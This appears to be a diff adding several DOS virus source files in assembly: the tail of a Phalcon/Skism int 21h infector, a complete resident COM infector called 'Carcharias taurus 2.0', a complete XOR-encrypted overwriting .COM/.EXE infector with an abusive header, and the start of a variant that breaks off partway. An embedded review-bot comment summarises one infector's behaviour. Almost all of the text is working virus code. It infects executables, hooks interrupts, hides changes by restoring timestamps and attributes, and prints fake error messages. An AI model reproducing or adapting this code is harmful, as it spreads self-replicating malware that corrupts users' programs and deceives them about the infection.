cmp ax, 4B00h ; execute?
jz execute
return:
jmp exitint21
execute:
mov word ptr cs:filename, dx
mov word ptr cs:filename+2, ds
mov ax, 3524h
int 0021h
push es
push bx
lea dx, INT24 ; ASSumes ds=cs
mov ax, 2524h
int 0021h
push cs
pop es
mov bx, dx
cmp word ptr [bx+5], 'DN' ; Check if COMMAND.COM
jz return ; Exit if so
lds dx, cs:filename
mov ax, 4300h
int 0021h
jc return
push cx
push ds
push dx
mov ax, 4301h ; clear file attributes
push ax ; save for later use
xor cx, cx
int 0021h
mov ax, 3D02h
lds dx, cs:filename
int 0021h
xchg ax, bx
push cs
pop ds
mov ax, 5700h ; get file time/date
int 0021h
push cx
push dx
mov ah, 003Fh
mov cx, 001Ah
mov dx, offset readbuffer
int 0021h
mov ax, 4202h
xor cx, cx
cwd
int 0021h
cmp word ptr [offset readbuffer], 'ZM'
jz checkEXE
mov cx, word ptr [offset readbuffer+1] ; jmp location
add cx, heap-start+3 ; convert to filesize
cmp ax, cx ; equal if already infected
jz jmp_close
cmp ax, 65535-(endheap-start) ; check if too large
ja jmp_close ; Exit if so
mov si, offset readbuffer
mov di, offset old3
movsb
movsw
mov cx, 0003h
sub ax, cx
mov word ptr [offset readbuffer+1], ax
mov dl, 00E9h
mov byte ptr [offset readbuffer], dl
jmp short continue_infect
checkEXE:
cmp word ptr [offset readbuffer+10h], id
jnz skipp
jmp_close:
jmp close
skipp:
lea si, readbuffer+14h
lea di, origCSIP
movsw ; Save original CS and IP
movsw
sub si, 000Ah
movsw ; Save original SS and SP
movsw
push bx ; save file handle
mov bx, word ptr [readbuffer+8] ; Header size in paragraphs
mov cl, 0004h
shl bx, cl
push dx ; Save file size on the
push ax ; stack
sub ax, bx ; File size - Header size
sbb dx, 0000h ; DX:AX - BX -> DX:AX
mov cx, 0010h
div cx ; DX:AX/CX = AX Remainder DX
mov word ptr [readbuffer+14h], dx ; IP Offset
mov word ptr [readbuffer+10h], id ; Initial SP
mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment
mov word ptr [readbuffer+16h], ax ; Para disp CS in module.
pop ax ; Filelength in DX:AX
pop dx
add ax, heap-start
adc dx, 0000h
mov cl, 0009h
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 0001h
mov word ptr [readbuffer+4], dx ; Fix-up the file size in
mov word ptr [readbuffer+2], ax ; the EXE header.
pop bx ; restore file handle
mov cx, 001Ah
continue_infect:
push cx ; save # bytes to write
mov cx, heap-start
mov ah, 0040h ; concatenate virus
mov dx, offset start
int 0021h
xor dx, dx
xor cx, cx
mov ax, 4200h
int 0021h
pop cx
mov ah, 0040h
mov dx, offset readbuffer
int 0021h
close:
mov ax, 5701h ; restore file time/date
pop dx
pop cx
int 0021h
mov ah, 003Eh
int 0021h
pop ax ; restore file attributes
pop dx ; get filename and
pop ds
pop cx ; attributes from stack
int 0021h
pop dx
pop ds
mov ax, 2524h
int 0021h
exitint21:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
db 00EAh ; return to original handler
oldint21 dd ?
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
creator db 'Phalcon/Skism',0
virusname db '[Gý Virus]',0
heap:
filename dd ?
readbuffer db 1ah dup (?)
endheap:
end start

@ -0,0 +1,378 @@
TITLE The Carcharias taurus 2.0
.MODEL Tiny
.CODE
.STARTUP
; Some Constants -------------------------------------------------------------
DogSize equ 584-16-6
; ----------------------------------------------------------------------------
db 0E9h ; JMP Loader
dw 3
db 0
dw 0256h
; ************************** DOG LOADER **************************************
Loader:
call GetBP ; Get BP
GetBP: pop BP
sub BP, 103h
push AX ; Save AX
; Find Z-MCB -----------------------------------------------------------------
mov AH, 52h
int 21h
mov DX, ES:[BX-2]
mov DI, (OFFSET Place)-6
mov DS:[BP+DI], DX
NEXT0:
mov DI, (OFFSET Place)-6
mov ES, DS:[BP+DI]
mov DX, ES:[3] ; Calc the next MCB seg
inc DX
add DS:[BP+DI], DX
cmp ES:[0], byte ptr 'Z'
jne NEXT0
; ----------------------------------------------------------------------------
; Looking for the Dog behind Z-MCB -------------------------------------------
push ES
mov DX, ES
add DX, ES:[3]
inc DX
mov ES, DX
mov DX, ES:[3]
pop ES
cmp DX, 815Dh ; 815Dh - Dog's bytes
je LExit
; ----------------------------------------------------------------------------
; Eat 1K in the Z-MCB, Current PSP, BIOS Data --------------------------------
push DS
sub ES:[3], word ptr 40h ; Dec Z-MCB
mov AH, 62h
int 21h
mov DS, BX
sub DS:[2], word ptr 40h ; Dec Curr PSP
xor DX, DX
mov DS, DX
dec word ptr DS:[413h]
pop DS
; ----------------------------------------------------------------------------
; Calculate Dog's segment adress ---------------------------------------------
mov DX, CS
add DX, ES:[3]
mov ES, DX
; ----------------------------------------------------------------------------
; Now load the Dog -----------------------------------------------------------
xor DI, DI
mov SI, BP
add SI, 100h
mov CX, DogSize
cld
rep movsb
; ----------------------------------------------------------------------------
; Hook 21h -------------------------------------------------------------------
; Get old vector
push ES
mov AX, 3521h
int 21h
mov DX, ES
pop ES
mov DI, (OFFSET Exit21h)-100h-6+1
mov ES:[DI], BX
inc DI
inc DI
mov ES:[DI], DX
; Set 21h to Dog
mov AX, 2521h
mov DX, (OFFSET Dog)-100h-6
push DS
push ES
pop DS
int 21h
pop DS
; ----------------------------------------------------------------------------
; Loader Exit ----------------------------------------------------------------
LExit:
; Restore first 6 bytes
mov DI, (OFFSET M_6Bytes)-6
mov AX, word ptr DS:[BP+DI]
inc DI
inc DI
mov BX, word ptr DS:[BP+DI]
inc DI
inc DI
mov CX, word ptr DS:[BP+DI]
mov word ptr CS:[100h], AX
mov word ptr CS:[102h], BX
mov word ptr CS:[104h], CX
; Restore all registers
pop AX
xor BX, BX
xor CX, CX
xor DI, DI
xor SI, SI
xor BP, BP
mov DX, 100h
push DX
xor DX, DX
push DS
pop ES
ret
; ----------------------------------------------------------------------------
; ************************** END of DOG LOADER *******************************
; ******************************* DOG **************************************
Dog:
pushf
cmp AX, 4B00h
je D01
jmp QuickExit
D01: push AX
push BX
push CX
push DX
push DI
push SI
push DS
push ES
push DX ; Store file name
push DS
; Effect ? -------------------------------------------------------------------
mov AH, 2Ah
int 21h
cmp CX, 1993 ; After 1992
jb EExit
cmp DH, 1 ; Jan,
jne EExit
mov AH, 2Ch
int 21h
cmp CH, 14
jne EExit
cmp CL, 30
jb EExit
; yes!
push CS
pop DS
mov CX, 20
mov AH, 2
mov SI, (OFFSET Tired)-100h-6
CHN: mov DL, byte ptr DS:[SI]
inc SI
dec DL
int 21h
loop CHN
; cli
; hlt
; ----------------------------------------------------------------------------
EExit:
; Store old int 24h vector ---------------------------------------------------
mov AX, 3524h ; Get intrpt vector (ES:BX)
int 21h
mov DI, (OFFSET Old24h)-100h-6
mov CS:[DI], BX ; Store BX
inc DI
inc DI
mov CS:[DI], ES ; Store ES
; ----------------------------------------------------------------------------
; Set new int 24h handler ----------------------------------------------------
mov AX, 2524h ; Set intrpt vector (DS:DX)
mov DX, (OFFSET INT24)-100h-6
push CS
pop DS
int 21h
; ----------------------------------------------------------------------------
; -----------------------------------------------------
pop DS
pop DX
; ----------------------------------------------------------------------------
; Open the file --------------------------------------------------------------
mov AX, 3D02h
int 21h
mov DI, (OFFSET Handle)-100h-6
mov CS:[DI], AX
jnc D02
jmp DExit
D02:
; ----------------------------------------------------------------------------
; Read 1st 6 bytes -----------------------------------------------------------
push CS
pop DS
mov AH, 3Fh
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov DX, (OFFSET M_6Bytes)-100h-6
mov CX, 6
int 21h
jnc D03
jmp DExit
D03:
; ----------------------------------------------------------------------------
; Check File Format ----------------------------------------------------------
mov DI, (OFFSET M_6Bytes)-100h-6
cmp CS:[DI], 4D5Ah
jne D04
jmp DExit
D04: cmp CS:[DI], 5A4Dh
je DExit
; ----------------------------------------------------------------------------
; Check File for Dog ---------------------------------------------------------
cmp CS:[DI+3], 0256h
je DExit
; ----------------------------------------------------------------------------
; Get and Store file Date&Time -----------------------------------------------
mov AX, 5700h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
int 21h
mov DI, (OFFSET FDate)-100h-6
mov CS:[DI], DX
inc DI
inc DI
mov CS:[DI], CX
; ----------------------------------------------------------------------------
; Get and Store file Size ----------------------------------------------------
mov AX, 4202h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
xor DX, DX
xor CX, CX
int 21h
mov DI, (OFFSET FSize)-100h-6
sub AX, 3
mov CS:[DI], AX
cmp AX, 64512
ja DExit
cmp AX, 6
jb DExit
; ----------------------------------------------------------------------------
; Add Dog to the file --------------------------------------------------------
push CS
pop DS
mov AH, 40h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov CX, DogSize
xor DX, DX
int 21h
; ----------------------------------------------------------------------------
; Write 1st 6 bytes to file --------------------------------------------------
; Move file ptr to the start
mov AX, 4200h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
xor DX, DX
xor CX, CX
int 21h
; Write ...
mov AH, 40h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov CX, 6
mov DX, (OFFSET DogCall)-100h-6
int 21h
; ----------------------------------------------------------------------------
DExit:
; Set file Date&Time ---------------------------------------------------------
mov AX, 5701h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov DI, (OFFSET FDate)-100h-6
mov DX, CS:[DI]
inc DI
inc DI
mov CX, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
; Close the file -------------------------------------------------------------
mov AH, 3Eh
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
; Restore int 24h ------------------------------------------------------------
mov AX, 2524h ; Set intrpt vector (DS:DX)
mov DI, (OFFSET Old24h)-100h-6
mov DX, CS:[DI]
inc DI
inc DI
mov DS, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
pop ES
pop DS
pop SI
pop DI
pop DX
pop CX
pop BX
pop AX
QuickExit: popf
Exit21h: db 0EAh
Int21hIP: dw 0 ; BX
Int21hCS: dw 0 ; ES
; Int 24h handler ------------------------------------------------------------
INT24: xor al, al ; Ignore critical error
iret
; ----------------------------------------------------------------------------
; **************************** END of DOG **********************************
DogData:
M_6Bytes db 90h, 90h, 90h, 90h, 90h, 0C3h
Tired db 11, 11, 'Ibqqz!Ofx!Zfbs!"', 14, 11
DogCall db 0E9h
FSize dw 0606h
Sign db 'V', 2
Handle dw 0606h
Vers dw 0606h
FDate dw 0606h, 0606h ; Date, Time
Old24h dw 0606h, 0606h ; BX:ES
Attrib dw 0606h
Place dw 0606h
END


@ -0,0 +1,278 @@
cr equ 13 ; This VIRUS was written 12-14-1992
lf equ 10 ; AND QUIT READING MY SOURCE CODE
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
virus_size equ 1973 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Bad command or filename$"
virus_msg1 db cr,lf," ÜÜÜÜÜÜ$"
virus_msg2 db cr,lf," ÜÜÜÜÜÜÜ ÜÜ ÜÜ ÜÛÛÛÛÛÛÛÛÜ$"
virus_msg3 db cr,lf,"ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ ÜÛÛÛÝ ÞÛÛÛÛßßÛÛÛÛÝ$"
virus_msg4 db cr,lf,"ÛÛÛÛ ÛÛÛÝÛÛÛß ÛÛÛÛÝ ÞÛÛÛÛ ÜÜÜÜ ÜÜÜÜ$"
virus_msg5 db cr,lf,"ÞÛÛÛÛÛÛÜ ÜÜ ÜÜ ÜÛÛÛÜ ÞÛÛÛÛÛÝ ÞÛÛÛÛ ÛÛÛÛÝ ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÜ$"
virus_msg6 db cr,lf,"ÛÛÛÛßßßßÞÛÛ ÛÛÛÝÞÛÛÛß ÞÛÛÛÛßÛÛÛ ÛÛÛÛÝ ÞÛÛÛÛ ÞÛÛÛß ßÛß ÞÛÛÛß ßÛß$"
virus_msg7 db cr,lf,"ÛÛÛÛÝ ÞÛÛÝÛÛÛÛÝÞÛÛÛÜ ÛÛÛÛÛÞÛÛÛÜ ÜÛÜ ÞÛÛÛÛÜÜÛÛÛÛÝÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛ$"
virus_msg8 db cr,lf," ßÛÛÛß ßÛÛÛÛÛß ßÛÛÛß ßÛÛß ßÛÛß Þßß Ý ßÛÛÛÛÛÛÛÛß ÞÛÛÝ ÞÛÛÝ$"
virus_msg9 db cr,lf," ÞÛÛÛÝ ßßßßßß ÛÛÛ ÛÛÛ$"
virus_msg10 db cr,lf," ÛßÜÛÛ ÞÛÛÝ ÞÛÛÝ$"
virus_msg11 db cr,lf," ÞÛßßÝ ÜÜÛÛß ÜÜÛÛß$"
virus_msg12 db cr,lf," ÜÜ ÞÛÛÛÝ ÜÜ ßßßß ßßßß$"
virus_msg13 db cr,lf," ÛÛÛÛÞÛÛÝÝÛÛÛÛ$"
virus_msg14 db cr,lf," ÞÛÝÛÛÛÛÞÜÛÛÝÞÛÛÛÝ ÜÜÜÛÛÛÜ$"
virus_msg15 db cr,lf," ÛÛÛÞÛÛÛÛÛÝÜ ÛÛÛÛÛÜÛÛÛßßß$"
virus_msg16 db cr,lf," ÛÛÛÛÛßÛÛ ÛßÛÛÛÛÛÛÛßß$"
virus_msg17 db cr,lf," ÛÛÛÛÛÛÜ ÛÜÛÛÛÛÛÛß$"
virus_msg18 db cr,lf," ßßÛÛÜÛÝÛÛÛÛÛÛÝ$"
virus_msg19 db cr,lf," ÞßÛÛÛ ÜÛÛÛÝ$"
virus_msg20 db cr,lf," ÛÜÛÛÝßßÜÛÛ$"
virus_msg21 db cr,lf," ÞÛÛÜÛÛÛÛÛÛÛÝ$"
virus_msg22 db cr,lf," ÞÛÛÛÛÝÛßÛÛÛÝ$"
virus_msg23 db cr,lf," ÞÛÛÜÛÜÛÛÛÛÛÝ$"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,10 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,5 ; Are at least 5 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
mov dx,offset virus_msg21
int 21h
mov dx,offset virus_msg22
int 21h
mov dx,offset virus_msg23
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
; filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main
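Review bot: The file has no descriptive header: it opens with constants and an abusive rant, so a reader triaging the archive has to reconstruct the sample's behaviour from the code. A short comment block at the top, in the style `; Non-resident, overwriting DOS .COM/.EXE infector, dated 12-14-1992; body from virus_code is XOR-encoded with a key taken from DL of int 21h/2Ch; already-written files are recognised by comparing their first 20 bytes with the in-memory image (key byte patched at offset 6); climbs to the parent directory via ".." between passes; prints a fake "Bad command or filename" on exit`, would state what the visible code shows. The same header is missing from the two variants that follow in this upload (the ones with `virus_size equ 2197` and `virus_size equ 562`), which differ only in strings, counters, the active `filler` line and, for the 562-byte one, the absence of the `encrypt_decrypt` routine. In all three files the comment on the `filler` line says the pad brings the file to 666 bytes, which contradicts the `virus_size` constant a few lines up; the header should give the real size and that comment should be corrected or dropped.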

@ -0,0 +1,276 @@
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 2197 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr," ÜÜÜßÜÛÛÛÜ $"
virus_msg2 db cr," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
virus_msg3 db cr," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
virus_msg4 db cr," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
virus_msg5 db cr," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
virus_msg6 db cr," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
virus_msg7 db cr," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
virus_msg8 db cr," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
virus_msg9 db cr," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
virus_msg10 db cr," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
virus_msg11 db cr," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
virus_msg12 db cr," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
virus_msg13 db cr," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
virus_msg14 db cr," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
virus_msg15 db cr," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
virus_msg16 db cr," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
virus_msg17 db cr," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
virus_msg18 db cr," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
virus_msg19 db cr,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
virus_msg20 db cr," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
virus_msg21 db cr," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
virus_msg22 db cr,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
